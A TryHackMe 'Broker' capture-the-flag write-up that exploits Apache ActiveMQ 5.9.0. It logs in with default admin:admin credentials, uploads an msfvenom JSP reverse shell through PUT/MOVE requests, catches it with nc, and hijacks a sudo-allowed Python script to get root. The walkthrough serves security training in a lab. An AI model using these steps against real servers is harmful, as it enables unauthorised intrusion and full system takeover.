TryHackme : Broker Writeup
In this article we are going to solve another CTF challenge broker from TryHackMe. This challenge includes finding an exploit for a particular software and gaining initial access using that exploit.
Challenge Link : https://tryhackme.com/room/broker
Initial Enumeration
As usual I started with nmap scan or rustscan for faster result using the command show below.
❯ rustscan 10.10.31.48 --range 0-65535 --ulimit 5000 -- -sC -sV -Pn -o nmap.txt
.
.
.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4c:75:a0:7b:43:87:70:4f:70:16:d2:3c:c4:c5:a4:e9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0E0J6enJ0afxy700qSiIX5MtF1OnZao36BxMDHd4z3X/fbRQc3WOsCzY9KsTw7RltG4bSBJGja3ppRbiLTowv+2aunR3nKPaR/Rea1NFCHPxonnYutUyqPsJIRnm+oV+hqd/rvn/BgLpdNo2bpWG1PG3gNVwmbuUqybL9XF3KoZz8gj6zZPJ+RV8yrM17R2bd1J7YgTMJBKSuKyzVQZJQHJMhdBLBOfVmF3PgajXe2Dm10xbL2rQ3Zsbbuk6hhc4Ypq1LYeZ1PA0aNuHoMzhjXlYQ3XElD5Rzr6rBo5LJr2VD2Y3mo86wyM6OZBb+B88Law3RJ4fwtjVgEoa2KX0F
| 256 f4:62:b2:ad:f8:62:a0:91:2f:0a:0e:29:1a:db:70:e4 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHyqJ0DAEyEKxeir3lNhPLTZNtDo/CfpLAKWpiSxZUd8NJIrcsNod31Tl+KSwMvNjNvW2ilD1YYxnO2A3FDApqg=
| 256 92:d2:87:7b:98:12:45:93:52:03:5e:9e:c7:18:71:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINqDlHwUjvqNDfhowAQHQMu7A/HVUijCXkxdkgpF/pSe
1883/tcp open mqtt? syn-ack
|_mqtt-subscribe: The script encountered an error: ssl failed
8161/tcp open http syn-ack Jetty 7.6.9.v20130131
|_http-favicon: Unknown favicon MD5: 05664FB0C7AFCD6436179437E31F3AA6
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: Jetty(7.6.9.v20130131)
|_http-title: Apache ActiveMQ
There is a website on port 8161 and probably the way to gain initial access, I tried to access /admin but it is protected using http basic authentication and then I thought to try some common credentials and admin:admin worked.
I found that software used is Apache ActiveMQ with version 5.9.0, So let's search for a publicly available exploit.
I found the exploit which is also available in metasploit but that didn't worked so I thought to give it a try manually, you can find a detailed explanation for this exploit here.
According to the exploit we have to upload a file to /fileserver/ using PUT method but files available on /fileserver/ doesn't have execute permission so for that we have to use MOVE method to move the malicious file to /admin/ location.
So first of all we are going to find the actual path for /admin/ directory and for that I visited /fileserver/ and intercept the request using burp suite.
PUT /fileserver/%80/%80
Host: IP:8161
Response :-
HTTP/1.1 500 /opt/apache-activemq-5.9.0/webapps/fileserver// (No such file or directory)
Content-Length: 0
Server: Jetty(7.6.9.v20130131)
We have the actual path for all the files, now we have just have to upload the reverse shell in JSP format using PUT Method.
❯ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.6.64.121 LPORT=1234 -f raw > shell.jsp
.
.
.
But when I checked the response, it said HTTP/1.1 401 Unauthorized because I forgot to provide HTTP Basic auth credentials. So I intercepted the request again for /admin/ and in that request, I found this thing Authorization: Basic YWRtaW46YWRtaW4=
Great now we just need to use this in our PUT request so that uploading the reverse shell will not give us the previous error.
We have successfully uploaded the JSP reverse shell but we can't execute it from /fileserver/, now we have to move this shell.jsp to /admin/ directory and for that we know that /admin/ is at /opt/apache-activemq-5.9.0/webapps/admin/. For this we are going to use Burpsuite again.
Perfect, now we can execute shell.jsp by visiting /admin/shell.jsp and don't forget to listen on the specified port using nc to catch the reverse shell.
❯ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.6.64.121] from (UNKNOWN) [10.10.31.48] 35848
id
uid=1000(activemq) gid=1000(activemq) groups=1000(activemq)
Privilege Escalation
It's time for privilege escalation, I found that we are inside a docker container so may be we need to escape from it somehow.
activemq@activemq:/opt/apache-activemq-5.9.0$ cat /proc/1/cgroup
cat /proc/1/cgroup
12:blkio:/docker/a0ecdd51642f19743a3c2e5b0f0d284a6953bbf19e160b83404ee0a3277ba7e5
11:cpuset:/docker/a0ecdd51642f19743a3c2e5b0f0d284a6953bbf19e160b83404ee0a3277ba7e5
10:cpu,cpuacct:/docker/a0ecdd51642f19743a3c2e5b0f0d284a6953bbf19e160b83404ee0a3277ba7e5
9:perf_event:/docker/a0ecdd51642f19743a3c2e5b0f0d284a6953bbf19e160b83404ee0a3277ba7e5
8:freezer:/docker/a0ecdd51642f19743a3c2e5b0f0d284a6953bbf19e160b83404ee0a3277ba7e5
7:pids:/docker/a0ecdd51642f19743a3c2e5b0f0d284a6953bbf19e160b83404ee0a3277ba7e5
Umm...but that's not the case we don't have to escape from the docker to gain access to host machine because running sudo -l gives us user privileges.
Matching Defaults entries for activemq on activemq:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User activemq may run the following commands on activemq:
(root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
So I renamed the subscribe.py to djfkl.py and created a new subscribe.py with the following content:
activemq@activemq:/opt/apache-activemq-5.9.0$ **mv subscribe.py djfkl.py**
.
.
.
cat subscribe.py
cat subscribe.py
#!/bin/bash
import os
os.system("/bin/bash")
activemq@activemq:/opt/apache-activemq-5.9.0$
Now running subscribe.py as user root gives us the root shell and also the root flag.
sudo -u root /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
sudo -u root /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
root@activemq:/opt/apache-activemq-5.9.0# cd /root
cd /root
root@activemq:~# ls
ls
root.txt
root@activemq:~# wc root.txt
wc root.txt
1 1 24 root.txt
We are root now and this completed the challenge. One thing that is not clear to me, what was the need of docker? Does apache activemq needs to be run on a docker or something else? If anyone can explain then please contact me on discord cyberbot#1859.
NOTE: The awesome artwork used in this article was created by chubasan.